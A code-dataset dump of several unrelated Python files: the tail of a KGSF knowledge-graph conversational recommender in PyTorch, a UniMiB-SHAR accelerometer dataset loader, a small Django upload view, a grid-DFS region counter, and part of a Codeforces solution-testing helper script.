relu_dropout=self.relu_dropout,\n embeddings_scale=self.embeddings_scale,\n learn_positional_embeddings=self.learn_positional_embeddings,\n padding_idx=self.pad_token_idx,\n n_positions=self.n_positions\n )\n self.conv_loss = nn.CrossEntropyLoss(ignore_index=self.pad_token_idx)\n\n logger.debug('[Finish build conv layer]')\n\n def pretrain_infomax(self, batch):\n \"\"\"\n words: (batch_size, word_length)\n entity_labels: (batch_size, n_entity)\n \"\"\"\n words, entity_labels = batch\n\n loss_mask = torch.sum(entity_labels)\n if loss_mask.item() == 0:\n return None\n\n entity_graph_representations = self.entity_encoder(None, self.entity_edge_idx, self.entity_edge_type)\n word_graph_representations = self.word_encoder(self.word_kg_embedding.weight, self.word_edges)\n\n word_representations = word_graph_representations[words]\n word_padding_mask = words.eq(self.pad_word_idx) 
# (bs, seq_len)\n\n word_attn_rep = self.word_self_attn(word_representations, word_padding_mask)\n word_info_rep = self.infomax_norm(word_attn_rep) # (bs, dim)\n info_predict = F.linear(word_info_rep, entity_graph_representations, self.infomax_bias.bias) # (bs, #entity)\n loss = self.infomax_loss(info_predict, entity_labels) / loss_mask\n return loss\n\n def recommend(self, batch, mode):\n \"\"\"\n context_entities: (batch_size, entity_length)\n context_words: (batch_size, word_length)\n movie: (batch_size)\n \"\"\"\n context_entities, context_words, entities, movie = batch\n\n entity_graph_representations = self.entity_encoder(None, self.entity_edge_idx, self.entity_edge_type)\n word_graph_representations = self.word_encoder(self.word_kg_embedding.weight, self.word_edges)\n\n entity_padding_mask = context_entities.eq(self.pad_entity_idx) # (bs, entity_len)\n word_padding_mask = context_words.eq(self.pad_word_idx) # (bs, word_len)\n\n entity_representations = entity_graph_representations[context_entities]\n word_representations = word_graph_representations[context_words]\n\n entity_attn_rep = self.entity_self_attn(entity_representations, entity_padding_mask)\n word_attn_rep = self.word_self_attn(word_representations, word_padding_mask)\n\n user_rep = self.gate_layer(entity_attn_rep, word_attn_rep)\n rec_scores = F.linear(user_rep, entity_graph_representations, self.rec_bias.bias) # (bs, #entity)\n\n rec_loss = self.rec_loss(rec_scores, movie)\n\n info_loss_mask = torch.sum(entities)\n if info_loss_mask.item() == 0:\n info_loss = None\n else:\n word_info_rep = self.infomax_norm(word_attn_rep) # (bs, dim)\n info_predict = F.linear(word_info_rep, entity_graph_representations,\n self.infomax_bias.bias) # (bs, #entity)\n info_loss = self.infomax_loss(info_predict, entities) / info_loss_mask\n\n return rec_loss, info_loss, rec_scores\n\n def freeze_parameters(self):\n freeze_models = [self.word_kg_embedding, self.entity_encoder, self.entity_self_attn, self.word_encoder,\n self.word_self_attn, self.gate_layer, self.infomax_bias, self.infomax_norm, self.rec_bias]\n for model in freeze_models:\n for p in model.parameters():\n p.requires_grad = False\n\n def _starts(self, batch_size):\n \"\"\"Return bsz start tokens.\"\"\"\n return self.START.detach().expand(batch_size, 1)\n\n def _decode_forced_with_kg(self, token_encoding, entity_reps, entity_emb_attn, entity_mask,\n word_reps, word_emb_attn, word_mask, response):\n batch_size, seq_len = response.shape\n start = self._starts(batch_size)\n inputs = torch.cat((start, response[:, :-1]), dim=-1).long()\n\n dialog_latent, _ = self.conv_decoder(inputs, token_encoding, word_reps, word_mask,\n entity_reps, entity_mask) # (bs, seq_len, dim)\n entity_latent = entity_emb_attn.unsqueeze(1).expand(-1, seq_len, -1)\n word_latent = word_emb_attn.unsqueeze(1).expand(-1, seq_len, -1)\n copy_latent = self.copy_norm(\n torch.cat((entity_latent, word_latent, dialog_latent), dim=-1)) # (bs, seq_len, dim)\n\n copy_logits = self.copy_output(copy_latent) * self.copy_mask.unsqueeze(0).unsqueeze(\n 0) # (bs, seq_len, vocab_size)\n gen_logits = F.linear(dialog_latent, self.token_embedding.weight) # (bs, seq_len, vocab_size)\n sum_logits = copy_logits + gen_logits\n preds = sum_logits.argmax(dim=-1)\n return sum_logits, preds\n\n def _decode_greedy_with_kg(self, token_encoding, entity_reps, entity_emb_attn, entity_mask,\n word_reps, word_emb_attn, word_mask):\n batch_size = token_encoding[0].shape[0]\n inputs = self._starts(batch_size).long()\n incr_state = None\n logits = 
[]\n for _ in range(self.response_truncate):\n dialog_latent, incr_state = self.conv_decoder(inputs, token_encoding, word_reps, word_mask,\n entity_reps, entity_mask, incr_state)\n dialog_latent = dialog_latent[:, -1:, :] # (bs, 1, dim)\n db_latent = entity_emb_attn.unsqueeze(1)\n concept_latent = word_emb_attn.unsqueeze(1)\n copy_latent = self.copy_norm(torch.cat((db_latent, concept_latent, dialog_latent), dim=-1))\n\n copy_logits = self.copy_output(copy_latent) * self.copy_mask.unsqueeze(0).unsqueeze(0)\n gen_logits = F.linear(dialog_latent, self.token_embedding.weight)\n sum_logits = copy_logits + gen_logits\n preds = sum_logits.argmax(dim=-1).long()\n logits.append(sum_logits)\n inputs = torch.cat((inputs, preds), dim=1)\n\n finished = ((inputs == self.end_token_idx).sum(dim=-1) > 0).sum().item() == batch_size\n if finished:\n break\n logits = torch.cat(logits, dim=1)\n return logits, inputs\n\n def _decode_beam_search_with_kg(self, token_encoding, entity_reps, entity_emb_attn, entity_mask,\n word_reps, word_emb_attn, word_mask, beam=4):\n batch_size = token_encoding[0].shape[0]\n inputs = self._starts(batch_size).long().reshape(1, batch_size, -1)\n incr_state = None\n\n sequences = [[[list(), list(), 1.0]]] * batch_size\n for i in range(self.response_truncate):\n if i == 1:\n token_encoding = (token_encoding[0].repeat(beam, 1, 1),\n token_encoding[1].repeat(beam, 1, 1))\n entity_reps = entity_reps.repeat(beam, 1, 1)\n entity_emb_attn = entity_emb_attn.repeat(beam, 1)\n entity_mask = entity_mask.repeat(beam, 1)\n word_reps = word_reps.repeat(beam, 1, 1)\n word_emb_attn = word_emb_attn.repeat(beam, 1)\n word_mask = word_mask.repeat(beam, 1)\n\n # at beginning there is 1 candidate, when i!=0 there are 4 candidates\n if i != 0:\n inputs = []\n for d in range(len(sequences[0])):\n for j in range(batch_size):\n text = sequences[j][d][0]\n inputs.append(text)\n inputs = torch.stack(inputs).reshape(beam, batch_size, -1) # (beam, batch_size, _)\n\n with torch.no_grad():\n dialog_latent, incr_state = self.conv_decoder(\n inputs.reshape(len(sequences[0]) * batch_size, -1),\n token_encoding, word_reps, word_mask,\n entity_reps, entity_mask, incr_state\n )\n dialog_latent = dialog_latent[:, -1:, :] # (bs, 1, dim)\n db_latent = entity_emb_attn.unsqueeze(1)\n concept_latent = word_emb_attn.unsqueeze(1)\n copy_latent = self.copy_norm(torch.cat((db_latent, concept_latent, dialog_latent), dim=-1))\n\n copy_logits = self.copy_output(copy_latent) * self.copy_mask.unsqueeze(0).unsqueeze(0)\n gen_logits = F.linear(dialog_latent, self.token_embedding.weight)\n sum_logits = copy_logits + gen_logits\n\n logits = sum_logits.reshape(len(sequences[0]), batch_size, 1, -1)\n # turn into probabilities,in case of negative numbers\n probs, preds = torch.nn.functional.softmax(logits).topk(beam, dim=-1)\n\n # (candeidate, bs, 1 , beam) during first loop, candidate=1, otherwise candidate=beam\n\n for j in range(batch_size):\n all_candidates = []\n for n in range(len(sequences[j])):\n for k in range(beam):\n prob = sequences[j][n][2]\n logit = sequences[j][n][1]\n if logit == []:\n logit_tmp = logits[n][j][0].unsqueeze(0)\n else:\n logit_tmp = torch.cat((logit, logits[n][j][0].unsqueeze(0)), dim=0)\n seq_tmp = torch.cat((inputs[n][j].reshape(-1), preds[n][j][0][k].reshape(-1)))\n candidate = [seq_tmp, logit_tmp, prob * probs[n][j][0][k]]\n all_candidates.append(candidate)\n ordered = sorted(all_candidates, key=lambda tup: tup[2], reverse=True)\n sequences[j] = ordered[:beam]\n\n # check if everyone has generated an end 
token\n all_finished = ((inputs == self.end_token_idx).sum(dim=1) > 0).sum().item() == batch_size\n if all_finished:\n break\n logits = torch.stack([seq[0][1] for seq in sequences])\n inputs = torch.stack([seq[0][0] for seq in sequences])\n return logits, inputs\n\n def converse(self, batch, mode):\n context_tokens, context_entities, context_words, response = batch\n\n entity_graph_representations = self.entity_encoder(None, self.entity_edge_idx, self.entity_edge_type)\n word_graph_representations = self.word_encoder(self.word_kg_embedding.weight, self.word_edges)\n\n entity_padding_mask = context_entities.eq(self.pad_entity_idx) # (bs, entity_len)\n word_padding_mask = context_words.eq(self.pad_word_idx) # (bs, seq_len)\n\n entity_representations = entity_graph_representations[context_entities]\n word_representations = word_graph_representations[context_words]\n\n entity_attn_rep = self.entity_self_attn(entity_representations, entity_padding_mask)\n word_attn_rep = self.word_self_attn(word_representations, word_padding_mask)\n\n # encoder-decoder\n tokens_encoding = self.conv_encoder(context_tokens)\n conv_entity_emb = self.conv_entity_attn_norm(entity_attn_rep)\n conv_word_emb = self.conv_word_attn_norm(word_attn_rep)\n conv_entity_reps = self.conv_entity_norm(entity_representations)\n conv_word_reps = self.conv_word_norm(word_representations)\n if mode != 'test':\n logits, preds = self._decode_forced_with_kg(tokens_encoding, conv_entity_reps, conv_entity_emb,\n entity_padding_mask,\n conv_word_reps, conv_word_emb, word_padding_mask,\n response)\n\n logits = logits.view(-1, logits.shape[-1])\n response = response.view(-1)\n loss = self.conv_loss(logits, response)\n return loss, preds\n else:\n logits, preds = self._decode_greedy_with_kg(tokens_encoding, conv_entity_reps, conv_entity_emb,\n entity_padding_mask,\n conv_word_reps, conv_word_emb, word_padding_mask)\n return preds\n\n def forward(self, batch, stage, mode):\n if len(self.gpu) >= 2:\n # forward function operates on different gpus, the weight of graph network need to be copied to other gpu\n self.entity_edge_idx = self.entity_edge_idx.cuda(torch.cuda.current_device())\n self.entity_edge_type = self.entity_edge_type.cuda(torch.cuda.current_device())\n self.word_edges = self.word_edges.cuda(torch.cuda.current_device())\n self.copy_mask = torch.as_tensor(np.load(os.path.join(self.dpath, \"copy_mask.npy\")).astype(bool),\n ).cuda(torch.cuda.current_device())\n if stage == \"pretrain\":\n loss = self.pretrain_infomax(batch)\n elif stage == \"rec\":\n loss = self.recommend(batch, mode)\n elif stage == \"conv\":\n loss = self.converse(batch, mode)\n return loss\n\n\nclass GateLayer(nn.Module):\n def __init__(self, input_dim):\n super(GateLayer, self).__init__()\n self._norm_layer1 = nn.Linear(input_dim * 2, input_dim)\n self._norm_layer2 = nn.Linear(input_dim, 1)\n\n def forward(self, input1, input2):\n norm_input = self._norm_layer1(torch.cat([input1, input2], dim=-1))\n gate = torch.sigmoid(self._norm_layer2(norm_input)) # (bs, 1)\n gated_emb = gate * input1 + (1 - gate) * input2 # (bs, dim)\n return gated_emb\n\n\nclass TransformerDecoderLayerKG(nn.Module):\n def __init__(\n self,\n n_heads,\n embedding_size,\n ffn_size,\n attention_dropout=0.0,\n relu_dropout=0.0,\n dropout=0.0,\n ):\n super().__init__()\n self.dim = embedding_size\n self.ffn_dim = ffn_size\n self.dropout = nn.Dropout(p=dropout)\n\n self.self_attention = MultiHeadAttention(\n n_heads, embedding_size, dropout=attention_dropout\n )\n self.norm1 = 
nn.LayerNorm(embedding_size)\n\n self.encoder_attention = MultiHeadAttention(\n n_heads, embedding_size, dropout=attention_dropout\n )\n self.norm2 = nn.LayerNorm(embedding_size)\n\n self.encoder_db_attention = MultiHeadAttention(\n n_heads, embedding_size, dropout=attention_dropout\n )\n self.norm2_db = nn.LayerNorm(embedding_size)\n\n self.encoder_kg_attention = MultiHeadAttention(\n n_heads, embedding_size, dropout=attention_dropout\n )\n self.norm2_kg = nn.LayerNorm(embedding_size)\n\n self.ffn = TransformerFFN(embedding_size, ffn_size, relu_dropout=relu_dropout)\n self.norm3 = nn.LayerNorm(embedding_size)\n\n def forward(self, x, encoder_output, encoder_mask, kg_encoder_output, kg_encoder_mask, db_encoder_output,\n db_encoder_mask):\n decoder_mask = _create_selfattn_mask(x)\n # first self attn\n residual = x\n # don't peak into the future!\n x = self.self_attention(query=x, mask=decoder_mask)\n x = self.dropout(x) # --dropout\n x = x + residual\n x = _normalize(x, self.norm1)\n\n residual = x\n x = self.encoder_db_attention(\n query=x,\n key=db_encoder_output,\n value=db_encoder_output,\n mask=db_encoder_mask\n )\n x = self.dropout(x) # --dropout\n x = residual + x\n x = _normalize(x, self.norm2_db)\n\n residual = x\n x = self.encoder_kg_attention(\n query=x,\n key=kg_encoder_output,\n value=kg_encoder_output,\n mask=kg_encoder_mask\n )\n x = self.dropout(x) # --dropout\n x = residual + x\n x = _normalize(x, self.norm2_kg)\n\n residual = x\n x = self.encoder_attention(\n query=x,\n key=encoder_output,\n value=encoder_output,\n mask=encoder_mask\n )\n x = self.dropout(x) # --dropout\n x = residual + x\n x = _normalize(x, self.norm2)\n\n # finally the ffn\n residual = x\n x = self.ffn(x)\n x = self.dropout(x) # --dropout\n x = residual + x\n x = _normalize(x, self.norm3)\n\n return x\n\n\nclass TransformerDecoderKG(nn.Module):\n \"\"\"\n Transformer Decoder layer.\n\n :param int n_heads: the number of multihead attention heads.\n :param int n_layers: number of transformer layers.\n :param int embedding_size: the embedding sizes. Must be a multiple of n_heads.\n :param int ffn_size: the size of the hidden layer in the FFN\n :param embedding: an embedding matrix for the bottom layer of the transformer.\n If none, one is created for this encoder.\n :param float dropout: Dropout used around embeddings and before layer\n layer normalizations. This is used in Vaswani 2017 and works well on\n large datasets.\n :param float attention_dropout: Dropout performed after the multhead attention\n softmax. This is not used in Vaswani 2017.\n :param float relu_dropout: Dropout used after the ReLU in the FFN. Not used\n in Vaswani 2017, but used in Tensor2Tensor.\n :param int padding_idx: Reserved padding index in the embeddings matrix.\n :param bool learn_positional_embeddings: If off, sinusoidal embeddings are\n used. 
If on, position embeddings are learned from scratch.\n :param bool embeddings_scale: Scale embeddings relative to their dimensionality.\n Found useful in fairseq.\n :param int n_positions: Size of the position embeddings matrix.\n \"\"\"\n\n def __init__(\n self,\n n_heads,\n n_layers,\n embedding_size,\n ffn_size,\n vocabulary_size,\n embedding,\n dropout=0.0,\n attention_dropout=0.0,\n relu_dropout=0.0,\n embeddings_scale=True,\n learn_positional_embeddings=False,\n padding_idx=None,\n n_positions=1024,\n ):\n super().__init__()\n self.embedding_size = embedding_size\n self.ffn_size = ffn_size\n self.n_layers = n_layers\n self.n_heads = n_heads\n self.dim = embedding_size\n self.embeddings_scale = embeddings_scale\n self.dropout = nn.Dropout(dropout) # --dropout\n\n self.out_dim = embedding_size\n assert embedding_size % n_heads == 0, \\\n 'Transformer embedding size must be a multiple of n_heads'\n\n self.embeddings = embedding\n\n # create the positional embeddings\n self.position_embeddings = nn.Embedding(n_positions, embedding_size)\n if not learn_positional_embeddings:\n create_position_codes(\n n_positions, embedding_size, out=self.position_embeddings.weight\n )\n else:\n nn.init.normal_(self.position_embeddings.weight, 0, embedding_size ** -0.5)\n\n # build the model\n self.layers = nn.ModuleList()\n for _ in range(self.n_layers):\n self.layers.append(TransformerDecoderLayerKG(\n n_heads, embedding_size, ffn_size,\n attention_dropout=attention_dropout,\n relu_dropout=relu_dropout,\n dropout=dropout,\n ))\n\n def forward(self, input, encoder_state, kg_encoder_output, kg_encoder_mask,\n db_encoder_output, db_encoder_mask, incr_state=None):\n encoder_output, encoder_mask = encoder_state\n\n seq_len = input.size(1)\n positions = input.new(seq_len).long() # (seq_len)\n positions = torch.arange(seq_len, out=positions).unsqueeze(0) # (1, seq_len)\n tensor = self.embeddings(input) # (bs, seq_len, embed_dim)\n if self.embeddings_scale:\n tensor = tensor * np.sqrt(self.dim)\n tensor = tensor + self.position_embeddings(positions).expand_as(tensor)\n tensor = self.dropout(tensor) # --dropout\n\n for layer in self.layers:\n tensor = layer(tensor, encoder_output, encoder_mask, kg_encoder_output, kg_encoder_mask, db_encoder_output,\n db_encoder_mask)\n\n return tensor, None\n","sub_path":"crslab/model/generation/kgsf.py","file_name":"kgsf.py","file_ext":"py","file_size_in_byte":31621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2558047","text":"import os\nimport numpy as np\nfrom scipy.io import loadmat\nfrom .base import dataset, real_dataset, classification_dataset\nfrom ..util.util import remove_gravity_data\n\ndef load_shar(basedir=\"UniMiB-SHAR/\", version=\"adl\", folds=10, random_split=False, **kwargs):\n full_data = loadmat(os.path.join(basedir, \"data\", \"%s_data.mat\" % version))[\n \"%s_data\" % version\n ]\n labids = loadmat(os.path.join(basedir, \"data\", \"%s_labels.mat\" % version))[\n \"%s_labels\" % version\n ]\n labs, ids = labids[:, 0], labids[:, 1]\n names = loadmat(os.path.join(basedir, \"data\", \"%s_names.mat\" % version))[\n \"%s_names\" % version\n ]\n\n data, labels, meta = [], [], []\n names = [str(n[0]) for n in names[:, 0]]\n for di, li, si in zip(full_data, labs, ids):\n labels.append(li - 1)\n data.append(np.stack([di[:151], di[151:302], di[302:]]).T)\n si = int(np.random.random() * folds) if random_split else si\n meta.append({\"subject\": si - 1, \"cv\": (si - 1) % folds, \"labels\": names})\n return 
data, labels, meta\n\n\ndef get_cv_split(data, split=0, gensplits=0, seed=543, cv_semisup=0, key=\"cv\", cv_valid=0, **kwargs):\n xtrain, ytrain, ztrain = [], [], []\n xvalid, yvalid, zvalid = [], [], []\n xtest, ytest, ztest = [], [], []\n x, y, z = data\n nsplits = max([int(zi[key]) for zi in z if key in zi]) + 1\n\n if gensplits:\n order = np.array([i % gensplits for i in range(len(x))], dtype=int)\n semisup_prng = np.random.RandomState(seed)\n semisup_prng.shuffle(order)\n z = [dict(cv=i) for i in order]\n\n for xi, yi, zi in zip(x, y, z):\n try:\n in_split = key in zi and (zi[key] == split or zi[key] in split)\n except:\n in_split = False\n\n if in_split:\n xtest.append(xi)\n ytest.append(yi)\n ztest.append(zi)\n elif key in zi and cv_valid > 0 and zi[key] in [((split + cvi) % nsplits) for cvi in\n range(abs(cv_semisup) + 1, abs(cv_semisup) + 1 + cv_valid)]:\n xvalid.append(xi)\n yvalid.append(yi)\n zvalid.append(zi)\n elif key in zi:\n yi = yi * 0 - 1 if \"mask\" in zi and zi[\"mask\"] else yi\n if cv_semisup > 0:\n yi = (\n yi\n if key in zi and zi[key] in [((split + cvi) % nsplits) for cvi in range(1, cv_semisup + 1)]\n else yi * 0 - 1\n )\n if cv_semisup < 0:\n zi['remove'] = not (key in zi and zi[key] in [((split + cvi) % nsplits) for cvi in\n range(1, abs(cv_semisup) + 1)])\n if \"remove\" not in zi or not zi[\"remove\"]:\n xtrain.append(xi)\n ytrain.append(yi)\n ztrain.append(zi)\n if cv_valid > 0:\n return (xtrain, ytrain, ztrain), (xvalid, yvalid, zvalid), (xtest, ytest, ztest)\n return (xtrain, ytrain, ztrain), (xtest, ytest, ztest), (xtest, ytest, ztest)\n\n\nclass shar(dataset, real_dataset, classification_dataset):\n def __init__(self, version='adl', cv_semisup=0, split=0, folds=10, basedir='UniMiB-SHAR/', xyz_channels=True, oned_stacks=0, remove_grav=True,\n **kwargs):\n dataset.__init__(self, **kwargs)\n self._name = 'SHAR_ALL'\n self._noutputs = 9 if version == 'adl' else 17\n self._labels = ['standing', 'getting up', 'walking', 'running', 'up stairs', 'jumping', 'down stairs', 'lying',\n 'sitting']\n self._args = kwargs\n self._cv_semisup = cv_semisup\n self._split = split\n self._folds = folds\n self._version = version\n self._basedir = basedir\n self.semisupervised = cv_semisup > 0\n self.rescale_images = False\n self.imagedata = False\n self.xyz_channels = xyz_channels\n self.remove_grav = remove_grav\n self.shar_standardize = False\n self.shar_instance_standardize = True\n self.oned_stacks = oned_stacks\n\n def fetch_data(self, download_dir=None):\n train, valid, testd = get_cv_split(\n load_shar(basedir=self._basedir, version=self._version, folds=self._folds, **self._args),\n cv_semisup=self._cv_semisup, split=self._split, **self._args)\n if self.remove_grav:\n train, valid, testd = remove_gravity_data(train), remove_gravity_data(valid), remove_gravity_data(testd)\n if self.shar_standardize:\n x = np.stack(train[0])\n mean = np.mean(x, axis=(0, 1), keepdims=True)[0]\n std = np.std(x, axis=(0, 1), keepdims=True)[0]\n train = ([np.tanh((t - mean) / (2 * std)) for t in train[0]],) + train[1:]\n valid = ([np.tanh((t - mean) / (2 * std)) for t in valid[0]],) + valid[1:]\n testd = ([np.tanh((t - mean) / (2 * std)) for t in testd[0]],) + testd[1:]\n if self.shar_instance_standardize:\n train = ([np.tanh((t - np.mean(t, axis=0, keepdims=True)) / (3 * np.std(t, axis=0, keepdims=True))) for t in train[0]],) + train[1:]\n valid = ([np.tanh((t - np.mean(t, axis=0, keepdims=True)) / (3 * np.std(t, axis=0, keepdims=True))) for t in valid[0]],) + valid[1:]\n testd = 
([np.tanh((t - np.mean(t, axis=0, keepdims=True)) / (3 * np.std(t, axis=0, keepdims=True))) for t in testd[0]],) + testd[1:]\n        if self.xyz_channels:\n            shape = (-1, 1, 151, 3)\n            train = np.stack(train[0]).reshape(shape)[:, :, 3:147], np.array(train[1])\n            valid = np.stack(valid[0]).reshape(shape)[:, :, 3:147], np.array(valid[1])\n            test = np.stack(testd[0]).reshape(shape)[:, :, 3:147], np.array(testd[1])\n\n            if self.oned_stacks:\n                train = (np.repeat(train[0], self.oned_stacks, axis=1), train[1])\n                valid = (np.repeat(valid[0], self.oned_stacks, axis=1), valid[1])\n                test = (np.repeat(test[0], self.oned_stacks, axis=1), test[1])\n        else:\n            shape = (-1, 151, 3, 1)\n            train = np.stack(train[0]).reshape(shape)[:, 3:147], np.array(train[1])\n            valid = np.stack(valid[0]).reshape(shape)[:, 3:147], np.array(valid[1])\n            test = np.stack(testd[0]).reshape(shape)[:, 3:147], np.array(testd[1])\n\n        self.data = dict(train=(train[0], train[1]),\n                         valid=(valid[0], valid[1]), test=(test[0], test[1]))\n\nclass shar_std(shar):\n    def __init__(self, **kwargs):\n        shar.__init__(self, **kwargs)\n        self.shar_standardize = True\n\nclass shar_istd(shar):\n    def __init__(self, **kwargs):\n        shar.__init__(self, **kwargs)\n        self.shar_instance_standardize = True\n","sub_path":"src/PC-HMM/tutorial_files/pcvae/datasets/shar.py","file_name":"shar.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99362021","text":"__author__ = 'nsaraiva'\n\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\n\n@csrf_exempt\n\ndef uploading(request):\n    if request.method == 'POST':\n        file = request.FILES  # was request.POST('request.FILES'), which would raise a TypeError\n        return render_to_response('C:/python25/djangoProjects/iris/forms/ok.html',{'file':file,})\n    else:\n        return render_to_response('C:/python25/djangoProjects/iris/forms/upload.html')\n    ","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262859980","text":"\ndef dfs(x,y):\n    if x <= -1 or x >= n or y <= -1 or y >= m:\n        return False\n    if G[x][y] == 0:\n        G[x][y] = 1\n\n        dfs(x,y+1)\n        dfs(x+1,y)\n        dfs(x,y-1)\n        dfs(x-1,y)\n\n        return True\n    return False\n\n# build the grid G\nn, m = map(int, input().split())\nG = []\nfor i in range(n):\n    G.append(list(map(int, input())))\n'''\n4 5\n00110\n00011\n11111\n00000\n'''\nprint(G)\n#\n# [\n# [0, 0, 1, 1, 0],\n# [0, 0, 0, 1, 1],\n# [1, 1, 1, 1, 1],\n# [0, 0, 0, 0, 0]\n# ]\n\nresult = 0\nfor i in range(n):\n    for j in range(m):\n        if dfs(i,j):\n            result += 1\nprint(result)","sub_path":"python-for-coding-test/음료수 얼려 먹기.py","file_name":"음료수 얼려 먹기.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271077768","text":"import pickle\nimport sys\nimport os\nimport re\n\nusage = (\n'''Usage:\n    python3 test_task.py task_letter file_name\nOptions:\n    --no-timeout: solution won't be terminated if it runs longer than 2 * (time limit).\n    --add_task: add a custom task (not required, but will allow setting for example custom time limit)\nThe config file is located in ~/.cf_helper_config - it determines commands used to compile and run solutions.'''\n)\n\ndefault_config_file = (\n'''# This file will be used by test_task to compile and test solutions.\n# Each line (except for comment lines which start with '#') should have the following format:\n# 
.extension,.extension2|compile command|run command\n# Compile command can be left empty if you use for example Python.\n# The name of the file passed as the argument to test_task will be put after the compile command or, if compile command is empty, after the run command.\n\n.cpp,.cc|g++ -std=c++11 -O2 -Wall|./a.out\n.py||python3'''\n)\n\nconfig_path = os.path.expanduser('~/.cf_helper_config')\nif not os.path.isfile(config_path):\n with open(config_path, 'w') as f:\n f.write(default_config_file)\n\nmem_div = None\nconfig = {}\nwith open(config_path, 'r') as f:\n for line in f:\n line = line.strip()\n if line and not line.startswith('#'):\n if line.startswith('mem_div'):\n mem_div = int(line.split('=')[1])\n else:\n split_line = line.split('|')\n if len(split_line) != 3:\n print(\"Incorrect config line (wrong amount of '|'): \", line)\n print('The config file is located in ' + config_path)\n sys.exit(1)\n extensions = split_line[0].split(',')\n for ext in extensions:\n if not ext.startswith('.'):\n print(\"Extension in config doesn't start with a '.': \", line)\n print('The config file is located in ' + config_path)\n sys.exit(1)\n config[ext.strip()] = (split_line[1].strip(), split_line[2].strip())\n\nadd_task_mode = False\ntask_shortname = ''\nprogram_name = ''\nuse_timeout = True\n\nif len(sys.argv) == 3:\n task_shortname = sys.argv[1].strip()\n program_name = sys.argv[2].strip()\nelif len(sys.argv) == 2:\n if '--add_task' in sys.argv:\n add_task_mode = True\n else:\n if '--no-timeout' in sys.argv:\n use_timeout = False\n program_name = sys.argv[1].strip()\n if '.' in program_name:\n task_shortname = program_name.rsplit('.', 1)[0]\n else:\n print(usage)\n sys.exit(1)\nelse:\n print(usage)\n sys.exit(1)\n\ncodeforces_data = True\n\ntasks = {}\ntry:\n with open('contest_info.pkl', 'rb') as f:\n tasks = pickle.load(f)\nexcept EnvironmentError as e:\n codeforces_data = False\n\nif add_task_mode:\n if not codeforces_data:\n tasks = {}\n task_shortname = input('Short task name: ').strip()\n tasks[task_shortname] = {}\n tasks[task_shortname]['name'] = input('Full task name: ').strip()\n tasks[task_shortname]['memory_limit'] = float(input('Memory limit (MB): '))\n tasks[task_shortname]['time_limit'] = float(input('Time limit (s): '))\n multiple_answers = input('Multiple answers possible for test cases? 
(Y/N): ')\n if multiple_answers.upper() == 'Y':\n tasks[task_shortname]['multiple_answers'] = True\n elif multiple_answers.upper() == 'N':\n tasks[task_shortname]['multiple_answers'] = False\n with open('contest_info.pkl', 'wb') as f:\n pickle.dump(tasks, f)\n sys.exit(0)\n\nif task_shortname.upper() in tasks:\n task_shortname = task_shortname.upper()\n\nif os.path.isfile(program_name):\n program_name = os.path.abspath(program_name)\n for ext in config:\n if program_name.endswith(ext):\n if config[ext][0]:\n print(ext + ' file, compiling: ' + config[ext][0] + ' ' + program_name)\n compile_ret = os.system(config[ext][0] + ' ' + program_name)\n if compile_ret == 0:\n print('Compilation successful.', end='\\n\\n')\n else:\n print('\\nCompilation not successful, exiting test_task.')\n sys.exit(1)\n program_name = config[ext][1]\n else:\n program_name = config[ext][1] + ' ' + program_name\n break\n# else: it's a command to execute\n\nCOLOR_RED = '\\033[91m'\nCOLOR_GREEN = '\\033[92m'\nCOLOR_BLUE = '\\033[94m'\nCOLOR_END = '\\033[0m'\n\nwa_text = COLOR_RED + 'WA' + COLOR_END\ncorrect_text = 'correct'\nok_text = COLOR_GREEN + 'OK' + COLOR_END\ntime_limit = None\n\nif codeforces_data and (task_shortname in tasks):\n print(tasks[task_shortname]['name'])\n if tasks[task_shortname]['multiple_answers']:\n print('In this task, multiple answers might be possible (probably). No WAs.')\n if tasks[task_shortname]['multiple_answers']:\n wa_text = COLOR_BLUE + '??' + COLOR_END\n correct_text = 'example'\n ok_text += ', user\\'s answer matches example answer'\n if tasks[task_shortname]['time_limit']:\n time_limit = tasks[task_shortname]['time_limit']\n print('Time limit: ' + format(time_limit, '.2f') + ' s')\n if tasks[task_shortname]['memory_limit']:\n print('Memory limit: ' + format(tasks[task_shortname]['memory_limit'], '.2f') + ' MB')\nelse:\n print(task_shortname + ' (no task data)')\n\nif time_limit == None:\n time_limit = 5\n print('Using default time limit: ' + format(time_limit, '.2f') + ' s')\nprint('')\n\ntime_regex = re.compile(r'^(\\d+\\.\\d+)\\s(\\d+)\\s(\\d+)$')\n\ndef time_command(command):\n timeout_command = ''\n if use_timeout:\n timeout_command = 'timeout ' + str(time_limit * 2.0)\n os.system(\"/usr/bin/time -f '%e %M %x' -o time.txt \" + timeout_command + ' ' + command)\n exec_time = ''\n exec_mem_used = ''\n exec_return_code = 0\n with open('time.txt', 'r') as f:\n for line in f:\n time_match = time_regex.search(line)\n if time_match != None:\n exec_time = time_match.group(1)\n exec_mem_used = int(time_match.group(2))/(1024*mem_div)\n exec_return_code = time_match.group(3)\n exec_error = ''\n if use_timeout and exec_return_code == '124':\n exec_error = 'Time limit exceeded, process killed after ' + format(time_limit * 2.0, '.2f') + ' s'\n elif exec_return_code != '0':\n exec_error = 'Process exited with exit status ' + exec_return_code\n return exec_time, exec_mem_used, exec_error\n\n# http://stackoverflow.com/questions/10035232/maximum-resident-set-size-does-not-make-sense\n# There is a bug in GNU time which makes it report 4 times too high memory usage\n# and it's fixed in some Linux distributions, but not in all of them.\n# The code below is a workaround to check if it happens with /usr/bin/time on this install.\n\nif mem_div is None:\n mem_div = 1\n mem_filename = 'mem_usage_test_sdilgf'\n with open(mem_filename + '.c', 'w') as f:\n f.write('int main() { return 0; }')\n os.system('gcc ' + mem_filename + '.c -o ' + mem_filename)\n if time_command('./' + mem_filename)[1] > 2.0:\n 
